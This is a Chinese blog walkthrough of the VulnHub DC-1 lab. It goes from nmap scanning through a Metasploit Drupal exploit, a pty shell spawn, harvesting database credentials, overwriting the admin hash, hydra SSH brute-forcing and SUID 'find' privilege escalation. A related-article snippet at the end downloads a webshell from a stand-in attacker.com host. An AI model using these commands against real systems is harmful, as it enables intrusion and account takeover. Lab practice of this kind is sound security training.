DC靶场系列--DC1

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量4.7k 收藏 60
点赞数 12
分类专栏: DC靶场系列 DC1靶场 渗透测试 文章标签: 安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BGiscool/article/details/125495742
版权

目录

引言

搭建环境

信息收集

漏洞分析 

 漏洞利用

引言

     DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,DC系列下载地址:官网下载(点击即可进入官网下载),百度网盘下载地址:https://pan.baidu.com/s/1n_mB0fZhP_s_6Kc0M8Tm1Q 
提取码:rmgj。接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。

搭建环境

        第一步准备VMware、kali、DC1,VMware和kali(我使用的是2022.01的镜像,这里由于镜像文件太大,我在网盘里放了种子文件,大家可以自己去官网下载):链接:https://pan.baidu.com/s/1ZTnwtyB89QVzRp851d9z2A 
提取码:ftlb。

        第二步,基本环境准备好之后,部署DC1靶场,打开VMware之后,点击文件 -> 打开 -> 选择下载好的DC1中的DC-1.ova,输入虚拟机名称和选择存储路径,点击导入,一般会弹出导入失败的对话框,不用理,直接点击重试。导入完成之后,先不要着急开机。

        第三步,再开机之前,得先配置网络,这里得注意,DC1所处的网段跟kali所处的网段得互通,双击网络适配器,这里我选择的是桥接模式,kali和DC1都是桥接模式。

         第四步,配置好网络之后,打开kali和DC1。

信息收集

kali打开终端,由于kali和DC1都是桥接模式,所以属于同一网站 ,使用arp-scan -l,查看网段所有的主机。得到DC1的IP地址。(172.163.1.55)

使用nmap对DC1进行扫描,nmap -A -p- 172.163.1.55                                                           

-A:选定用于使用进攻性方式扫描

-p :扫描指定的端口(没有指定,默认对所有端口进行扫描)

 发现DC1的22端口、80端口、111端口是打开的,22端口可以使用爆破、ssh远程连接,80端口可以登录web网页,

在本机打开浏览器,使用http://172.168.1.55访问网页,

漏洞分析 

通过火狐浏览器插件wappalyzer发现,该网站使用的是Drupal 7的CMS搭建的,所以直接在kali的msf中搜索漏洞,在启动msf前先初始化msf的数据库(msfdb init),再使用msfconsole启动msf。

 在msf中搜索drupal 7的漏洞(search drupal 7.x),发现有一个可以利用的攻击脚本,

 漏洞利用

使用此脚本(use 0),再使用options查看此脚本的参数信息,

在此只需要配置RHOSTS,使用set rhosts 172.163.1.55(DC1的ip),设置完输入run,即可进入DC1的shell环境。 

 到此,我们得到的是一个不完整的shell,所以使用python中的pty模块,来反弹一个完整的shell,

python -c 'import pty;pty.spawn("/bin/bash")'

到这里,我们进入到了DC1的www-data用户下,并在当前目录下发现了flag1.txt,我们查看flag1.txt,得到提示:任何一个完善的CMS都需要配置文件---所以你应该怎么做。

 

 提示我们去找配置文件,这里没有技巧,就是挨个目录去找,

最终我们发现在sites文件下有个default文件,里面有settings.txt,我们怀疑这个就是配置文件。

 查看settings.txt(cat settings.txt),我们发现了数据库的用户名/密码,以及数据库名。

我们使用此用户名密码,连接数据库。

mysql -udbuser -pR0ck3t;

 连接成功之后,使用数据库,查看当前数据库drupaldb下的数据表,(记得在数据库操作的语句后面输;) 

use drupaldb;
show tables;

 在数据表中我们发现,有个users的表,我们使用数据库查询语句,查users表的内容。

select * from users;

 在users表中,我们发现有admin用户,但是密码是加盐过的,一般加盐的密码是很难破解的,所以选择修改用户密码来解决。首先生成自定密码的加盐哈希值。退出mysql,回到/var/www下执行以下代码,生成自己的加盐密码,

exit           //退出mysql的shell
cd /var/www    //回到网站目录
php scripts/password-hash.sh  自己设置的密码
php scripts/password-hash.sh 123456

 再次连接数据库,使用drupaldb数据库,使用updata数据库执行语句将admin的密码设置为刚生成的加盐密码。

update users set pass="$S$D38o/6Z0AKdbU2T3EM0qOaiGN8UyKK6V/5oXQETlRf4ZfLgaf8UV" where uid=1;

 接下来我们就可以使用admin/123456,在浏览器登录了。

 

进入网站,点击左上角的Dashboard,查看到flag3.txt。

根据flag3中提示,去查看存放用户信息的文件和存放密码信息的文件, /etc/shadow无法查看,权限不够,查看etc/passwd,发现目标靶机用户flag4,并且有/bin/bash,看到这想到了还有端口22,所以ssh连接。

 但是我们不知道密码,所以我们在此使用kali自带的hydra爆破,使用kali自带的密码字典,路径为/usr/share/john/password.lst,kali自带各种密码默认保存在/usr/share/下。

所以我们在kali新打开一个终端,使用hydra对flag4用户做爆破,(这里解释一下,由于这篇文章边实验做编写,中途换了无线网,导致桥接的DC1的ip从172.163.1.55换成了192.168.0.119,这里大家做的时候不影响,直接按之前DC1的ip做就行。

hydra -l flag4 -P /usr/share/john/password.lst 192.168.0.119 ssh -vV -f

 其中-l表示指定爆破的用户,-P表示指定使用哪个密码字典,ip为DC1的ip,利用ssh协议做爆破。

我们爆破得到,DC1的一个用户名密码为:flag4/orange, 所以我们新打开一个终端,采用ssh协议直接连接,

ssh flag4@192.168.0.119

 在flag4用户下,我们发现了flag4.txt。根据提示,我们需要拿到root用户的权限,才能得到最终的flag。

在这里我们使用suid提权(后面我会出一期详细的提权文章),通过命令查看是否具有root权限的命令。

find / -perm -4000 2>/dev/null

 发现_find_具有root权限。直接执行命令提权。

find -exec /bin/sh \;

 通过执行命令,成功提权到root用户。

此时,我们切换到root目录下,看到了最后的flag,thefinalflag.txt

南巷油条
关注
  • 12
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2663
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC-1渗透靶场实战速通版
saber的博客
12-01 807
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC-7靶场
最新发布
mlws1900的博客
03-27 891
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
DC-3靶场搭建及渗透实战详细过程(DC靶场系列
金 帛的博客
07-27 5162
DC-3靶场渗透过程
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1靶场
mlws1900的博客
03-21 1046
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
kali之vulhub,medium_socnet
weixin_54431413的博客
05-06 1832
一、部署环境 二、进行主机发现,arp-scan进行扫描 三、使用nmap扫描发现的靶机IP 四、扫目录(dirsearch脚本;和windous御剑类似) 五、跳出docker容器系统隔离环境 六、内网穿透 七、对内网地址172.17.0.1进行扫描 八、对内网地址172.17.0.2进行扫描 九、利用开放的22端口ssh服务 十、提权 十一、成功拿到宿主机root权限
DC1靶场 Drupal
m0_62438849的博客
03-02 1079
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
Romax学习资料-DC1模块-载荷谱处理
03-14
Romax学习资料-DC1模块_载荷谱处理
docker-compose version 1.23.0,build c8524dc1
09-01
centos7安装docker后,并没有安装docker-compose,而且很多源里没有,无法通过yum安装,wget github的源码,有时候会很慢,这里提供一个现成的,源码编译好的docker-compose。centos7安装docker和docker-compose,...
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
ST_DC1-configs:DC1子卡的Machinekit配置文件(对于DE10-Nano)
02-21
ST_DC1-配置 DC1子卡的机器套件配置文件(对于DE10-Nano) 用于ShadeTechnik DC1子卡的DE10-Nano硬件测试和设置的Machinekit Hal和GUI文件。 仍在进行中,可能会进行修订。
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1149
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
【vulnhub靶场】-dc1
weixin_43446292的博客
04-13 336
1、环境配置: kali:88.16.153.33 dc1:88.16.153.36 补充:kali需设为桥接模式,因为dc靶机打开需要登录,kali设为桥接模式后与dc1在同一个局域网内,可以在kali中扫描得知dc1的ip地址;dc1的下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 需要找到5个flag.txt 2、信息收集: 2.1 使用arp-scan -l,探测存活主机,也可使用nmap 88.16.153.33/24(较慢) 2.使用nmap查询开
DC1-靶机详解
TonyChaoWei的博客
02-06 1639
DC系列靶机渗透实战 提权
网络渗透作业NO.2
xwzy_lh的博客
11-12 57
校园网的IP无法被直接获取,可见校园网被做了一定的安全保护,具备一定的安全防护行。手机热点一般不会有额外的保护措施,可被直接获得IP。所以校园网的安全性是大于手机热点的。1、Kali虚拟机采用桥接模式;物理机连接Guet-WiFi,Kali中查看网络配置并截图,能获得IP地址吗?2、Kali虚拟机采用桥接模式;物理机连接手机热点,Kali中查看网络配置并截图,能获得IP地址吗?kali中不能直接查看GUET-WIFI的IP地址。3、对于1、2的结果,进行总结分析。kali中可直接查看IP地址。
DC-1靶场初探
m0_52361291的博客
06-19 698
DC系列靶场环境,这是个模拟红队从信息收集到打点再到提权可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的。靶场下载环境:https ://download.vulnhub.com/dc/DC-1.zip下载完成后就是一个DC-1.ova文件双击用vm打开 就行了可以看到整个环境测试为黑盒测试(无登录账户和密码)首先,先对目标进行信息收集可以看到靶机开了22,80,111三个端口通过浏览器去访问靶机的网页可以看出是DrupalCM
DC-1靶机渗透
plant1234的博客
04-17 1159
简介 靶机名称:DC1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 一、信息收集 利用nmap扫描发现主机: nmap -sP 192.168.229.0/24 获取主机为:192.168.229.180 收集主机端口和其它信息: nmap -sS -sV -T5 -A -p- 192.168.229.180 发现开发22端口和80端口,并且运行在Linux上 二、漏洞查找 发现有80端口直接访问得到: 发现是cms是drupal,用msf看一
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值